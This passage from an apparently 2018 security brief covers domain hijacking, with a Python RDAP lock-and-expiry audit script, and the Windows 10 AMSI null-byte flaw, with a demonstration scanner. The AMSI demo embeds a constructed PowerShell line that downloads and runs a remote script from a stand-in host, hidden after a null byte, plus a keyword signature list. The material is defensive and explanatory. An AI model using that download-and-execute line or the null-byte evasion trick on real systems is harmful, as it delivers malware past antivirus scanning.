    • Verify the integrity and authenticity (hash or digital signature) of files downloaded from the internet
    • Monitor system activities for malicious behavior
    • Run updated anti-virus/anti-malware software as a first line of defense
    • Overall, practice good end-user awareness and training—an informed user will be less of an inadvertent security threat to the company.

    2. Domain Hijacking

    Overview

    Domain hijacking, where an attacker takes control of an organization’s domain name registration, could have significant negative implications for any company or organization with a web presence. Attackers could replace a company’s website or web application with an identical replica designed to trick visitors into entering login credentials or personal information, facilitating fraud, or serve malicious software to visitors’ computers. If the hijacked domain had been whitelisted by other businesses, that trust would be extended to the attacker. Such actions would almost certainly cause significant reputational as well as financial damage to affected organizations. Managed service providers are likely to be a higher-priority target for domain hijacking because of the access to, and damage they could cause at, their clients.

    Recommendations

    We recommend companies protect themselves by:

    • Choosing an enterprise-class domain registrar
    • Keeping up to date with security patches on servers and systems
    • Enabling the registrar lock (transfer lock) on the domain to guard against unauthorized transfers
    • Ensuring all domain contacts have valid, monitored contact information
    • Setting the domain to auto-renew each year
    • Protecting the registrar account itself with a strong, unique password and MFA
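    The lock and renewal items in the list above can be audited from outside the organization, which makes them a good periodic check. The following is an added example and not part of the original brief or any registrar’s tooling: it reads an RDAP response (RDAP is the JSON successor to WHOIS) and reports missing EPP locks and an approaching or passed expiry. In RDAP the status “client transfer prohibited” is the registrar lock the recommendation refers to; the update and delete locks stop contact changes and deletion without a conscious unlock. The two responses below are constructed samples in the RDAP shape, and the live lookup helper assumes the rdap.org redirector is reachable; it is not exercised here.

```python
"""
Added example (not from the original brief or any registrar): audit registrar
locks and expiry from an RDAP response. Sample responses are constructed.
"""
import json
from datetime import datetime
from typing import Dict, List
from urllib.request import urlopen

REQUIRED_LOCKS = {
    "client transfer prohibited",   # the registrar (transfer) lock
    "client update prohibited",     # no silent contact/nameserver changes
    "client delete prohibited",     # no deletion without an explicit unlock
}

# Constructed: only the transfer lock set, expiring in about ten weeks.
SAMPLE_RDAP_WEAK = json.dumps({
    "objectClassName": "domain",
    "ldhName": "example.test",
    "status": ["client transfer prohibited"],
    "events": [
        {"eventAction": "registration", "eventDate": "2010-06-01T00:00:00Z"},
        {"eventAction": "expiration", "eventDate": "2018-06-01T00:00:00Z"},
    ],
})

# Constructed: all three locks and more than a year to run.
SAMPLE_RDAP_LOCKED = json.dumps({
    "objectClassName": "domain",
    "ldhName": "example.test",
    "status": sorted(REQUIRED_LOCKS),
    "events": [{"eventAction": "expiration", "eventDate": "2019-06-01T00:00:00Z"}],
})


def audit(rdap: Dict, now: datetime, warn_days: int = 90) -> List[str]:
    """Return findings; an empty list means the domain looks healthy."""
    findings = []
    status = {s.lower() for s in rdap.get("status", [])}
    for lock in sorted(REQUIRED_LOCKS - status):
        findings.append("missing lock: %s" % lock)
    expiry = next((e.get("eventDate") for e in rdap.get("events", [])
                   if e.get("eventAction") == "expiration"), None)
    if expiry is None:
        findings.append("no expiration event reported; check the registrar directly")
    else:
        exp_dt = datetime.fromisoformat(expiry.replace("Z", "+00:00"))
        days = (exp_dt - now).days
        if days < 0:
            findings.append("domain EXPIRED %d days ago" % -days)
        elif days < warn_days:
            findings.append("expires in %d days; confirm auto-renew and a valid payment method" % days)
    return findings


def audit_json(text: str, now_iso: str) -> List[str]:
    """Wrapper over a raw RDAP body and an ISO-8601 'now' that carries a UTC offset."""
    return audit(json.loads(text), datetime.fromisoformat(now_iso))


def fetch_rdap(domain: str) -> Dict:
    """Live lookup. Assumption: rdap.org redirects to the registry's RDAP server."""
    with urlopen("https://rdap.org/domain/%s" % domain, timeout=10) as resp:
        return json.load(resp)


if __name__ == "__main__":
    now = "2018-03-21T00:00:00+00:00"   # the date of this brief
    print("weak:", audit_json(SAMPLE_RDAP_WEAK, now))
    print("locked:", audit_json(SAMPLE_RDAP_LOCKED, now))
```

    Against the weak sample the audit reports the two missing locks and an expiry 72 days out; against the locked sample it reports nothing. Run it on a schedule against `fetch_rdap(domain)` and alert on any non-empty result, so that a lock quietly removed by a compromised registrar account is noticed before the transfer completes.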

    3. Windows 10 Null Character Flaw

    Overview

    The Windows 10 Antimalware Scan Interface (AMSI), which lets applications hand content to the installed antivirus for scanning, was found to stop reading whenever it encountered a null character, leaving everything after it unscanned.

    AMSI performs at least part of the scanning for the antivirus product it interfaces with, and it simply stopped processing at a null byte (a byte with the value zero). Any malicious code placed after the null byte was never seen by the scanner and could execute without detection, which in effect bypasses the anti-malware scan altogether.

    AMSI inspects script content at the moment it is executed, including script assembled in memory, for PowerShell, VBScript and JScript among others. Scripts are a common way of getting malware past antivirus scanners, so anything that makes that easier, like this flaw, requires immediate action.
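    The failure mode is the classic one of handing a length-counted buffer to code that treats it as a C string. As an added example, and not Microsoft’s AMSI implementation, the block below puts a scanner that truncates at the first null byte beside one that honours the full length and also matches against a null-stripped copy, so a signature deliberately broken up by embedded nulls is still caught. The signature list and the sample PowerShell are constructed for the demonstration.

```python
"""
Added example, not Microsoft's AMSI code: null-byte truncation in a scanner,
beside the length-aware fix. Signatures and sample script are constructed.
"""
from typing import List

SIGNATURES = [b"Invoke-Expression", b"DownloadString", b"FromBase64String"]

# Constructed sample: a harmless line, a NUL byte, then the real payload.
SAMPLE_SCRIPT = (
    b"Write-Host 'nothing to see here'\x00"
    b"$c = New-Object Net.WebClient; "
    b"Invoke-Expression $c.DownloadString('http://example.invalid/p.ps1')"
)


def scan_truncating(content: bytes) -> List[bytes]:
    """Vulnerable: behaves like a scanner that hands the buffer to C-string
    APIs, so everything after the first NUL is invisible to it."""
    visible = content.split(b"\x00", 1)[0]
    return [s for s in SIGNATURES if s in visible]


def scan_full(content: bytes) -> List[bytes]:
    """Fixed: honour the caller-supplied length, and also match against a
    NUL-stripped copy so a signature broken up by embedded NULs is caught."""
    views = (content, content.replace(b"\x00", b""))
    return [s for s in SIGNATURES if any(s in v for v in views)]


def bytes_unscanned(content: bytes) -> int:
    """How many bytes the truncating scanner never looked at."""
    return len(content) - len(content.split(b"\x00", 1)[0])


if __name__ == "__main__":
    print("truncating scanner:", scan_truncating(SAMPLE_SCRIPT))   # []
    print("length-aware scanner:", scan_full(SAMPLE_SCRIPT))
    print("bytes skipped:", bytes_unscanned(SAMPLE_SCRIPT))
```

    The truncating scanner returns no matches for the sample even though both signatures are present, which is the bypass the brief describes; the length-aware scanner finds both. The null-stripped view is worth keeping after the fix as well, since the same trick reappears whenever an interpreter tolerates bytes the scanner does not.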

    Recommendations

    Microsoft’s February 2018 security updates fix this vulnerability, but that does not mean attackers will stop trying to exploit it on machines that have not applied them. WannaCry, Petya and other widespread attacks of 2017 relied on unpatched systems to propagate.

    There’s no reason to assume attackers will stop relying on human error to spread malware, so be safe and install the February Windows 10 security updates ASAP.
